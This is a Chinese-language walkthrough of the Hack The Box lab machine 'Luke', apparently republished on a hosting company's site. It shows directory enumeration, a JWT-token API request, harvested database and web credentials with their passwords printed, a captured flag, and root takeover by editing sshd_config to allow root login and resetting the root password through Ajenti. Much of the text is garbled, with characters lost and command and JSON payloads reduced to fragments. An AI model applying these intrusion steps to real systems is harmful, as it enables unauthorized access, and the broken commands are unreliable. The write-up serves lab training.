這篇文章將為大家詳細(xì)講解有關(guān)如何進(jìn)行HTB-Luke實戰(zhàn)�����,文章內(nèi)容質(zhì)量較高�����,因此小編分享給大家做個參考��,希望大家閱讀完這篇文章后對相關(guān)知識有一定的了解�。
目前創(chuàng)新互聯(lián)已為1000+的企業(yè)提供了網(wǎng)站建設(shè)����、域名、雅安服務(wù)器托管��、網(wǎng)站托管維護(hù)、企業(yè)網(wǎng)站設(shè)計��、大竹網(wǎng)站維護(hù)等服務(wù)�,公司將堅持客戶導(dǎo)向、應(yīng)用為本的策略���,正道將秉承"和諧、參與�����、激情"的文化���,與客戶和合作伙伴齊心協(xié)力一起成長����,共同發(fā)展��。
信息收集
打開10.10.10.137 發(fā)現(xiàn)就?個靜態(tài)???般我習(xí)慣先看?下源碼發(fā)現(xiàn)是?個靜態(tài)???了
Bootstrap 4
端口測試
1. 10.10.10.137:8000 ?個Ajenti登陸??
2. 10.10.10.137:3000返回
{"success":false,"message":"Auth token is not supplied"}目錄遍歷
習(xí)慣?dirsearch.py 分別對80���、3000進(jìn)??錄遍歷
80端?發(fā)現(xiàn)
[] - B - /.ht_wsr.txt
[] - B - /.htaccess-dev
[] - B - /.htaccess-local
[] - B - /.hta
[] - B - /.htaccess-marco
[] - B - /.htaccess.bak1
[] - B - /.htaccess.BAK
[] - B - /.htaccess.old
[] - B - /.htaccessOLD
[] - B - /.htaccess.orig[::] - B - /.htaccess_orig
[] - B - /.htaccess.sample
[] - B - /.htaccess.txt
[] - B - /.htaccess_sc
[] - B - /.htaccessBAK
[] - B - /.htaccess_extra
[] - B - /.htaccess.save
[] - B - /.htpasswd-old
[] - B - /.htaccess~
[] - B - /.htpasswds
[] - B - /.htpasswd_test
[] - B - /.htaccessOLD2
[] - B - /.htgroup
[] - B - /.htusers
[] - B - /config.php
[] - B - /css -> http:
[] - KB - /index.html
[] - B - /js -> http:
[] - KB - /login.php
[] - B - /management
[] - B - /management/
[] - B - /member -> http:
[] - KB - /package.json
[] - KB - /README.md
其中 /management 和 login.php 也是?個登陸??? /config.php 包括了MySQL賬號密碼
$dbHost = ; $dbUsername = ; $dbPassword = ;
$db = ; $conn = mysqli($dbHost, $dbUsername, $dbPassword,$db)
(. $conn -> error);
3000端?發(fā)現(xiàn)
[::] Starting:
[::] - B - /login
[::] - B - /Login
[::] - B -
[::] - B -
[::] - B - /users
[::] - B - /users/admin
[::] - B - 其中 /login 返回 , users 也是返回 {:,:}整合信息
三個登陸??
10.10.10.137:8000�����、10.10.10.137/login.php���、10.10.10.137/management
?個mysql賬號密碼root/Zk6heYCyv6ZE9Xcg
10.10.10.137:3000返回信息
{:,:}10.10.10.137:3000/login返回
"please auth"
具體分析
突破?在
在 "Auth token is not supplied"
Google?下發(fā)現(xiàn)是jwt認(rèn)證失敗的?個返回信息因此推測應(yīng)該構(gòu)造認(rèn)證信息post到
10.10.10.137:3000然后獲取到?戶憑證接著?這個?戶憑證去請求
10.10.10.137:3000/users���。
這?post的?戶信息?概就是上?的mysql賬戶密碼因為只有這?個可以?了?且這個賬戶信息嘗試
登陸在?個登陸??以及mysql服務(wù)端均沒有成功。
使?curl
curl -s -X POST -H 'Accept: application/json' -H 'Content-Type:
application/json' --data '{:,:}'回顯信息
Error
SyntaxError: Unexpected token r in JSON at position 11
at JSON.parse (<anonymous>) at parse
(/nodeapp/node_modules/body-parser/lib/types/json.js:89:19)
at /nodeapp/node_modules/body-parser/lib/read.js:121:18
at invokeCallback (/nodeapp/node_modules/raw-body/index.js:224:16)
at done (/nodeapp/node_modules/raw-body/index.js:213:7)
at IncomingMessage.onEnd (/nodeapp/node_modules/rawbody/index.js:273:7) at IncomingMessage.emit
(events.js:202:15) at endReadableNT
(_stream_readable.js:1132:12) at processTicksAndRejections
(internal/process/next_tick.js:76:17)
不知道是什么原因估計是curl哪?構(gòu)造錯了但是可以確定的是思路是對的換?postman發(fā)送json
請求
獲取到admin的
token
3
?這個token請求/users和/users/{user}
-H -H
https://10.10.10.137:3000/users
獲取到
[{:,:,:},
{:,:,:},
{:,:,:},
{:,:,:}]
{:,:}%
{:,:}%
{:,:}%
{:,:登陸到http://10.10.10.137/management訪問http://10.10.10.137/management/config.json
獲取到root/KpMasng6S5EtTy9Z的賬戶信息最后登陸到
10
flag:8448343028fadde1e2a1b0a44d01e650
提權(quán)
直接?root/KpMasng6S5EtTy9Z登陸ssh不?說明這只是web的賬號�����。但是ajenti服務(wù)是具有root權(quán)
限的也說明可以任意操作了���。
?File Manager翻了?下配置?件可以直接找到ssh的配置?件/etc/sshd_config并且有編輯的權(quán)限��。
那么修改配置項
PermitRootLogin yes
重新啟動ssh服務(wù)再試?下登陸ssh發(fā)現(xiàn)還是不?可能root
密碼并不是web賬戶密碼這?有Users打開并直接重置root密碼不需要舊密碼重置
ssh登陸
關(guān)于如何進(jìn)行HTB-Luke實戰(zhàn)就分享到這里了��,希望以上內(nèi)容可以對大家有一定的幫助�,可以學(xué)到更多知識�。如果覺得文章不錯�,可以把它分享出去讓更多的人看到。
名稱欄目:如何進(jìn)行HTB-Luke實戰(zhàn)
當(dāng)前路徑:
http://weahome.cn/article/ihsged.html
重慶分公司
重慶分公司
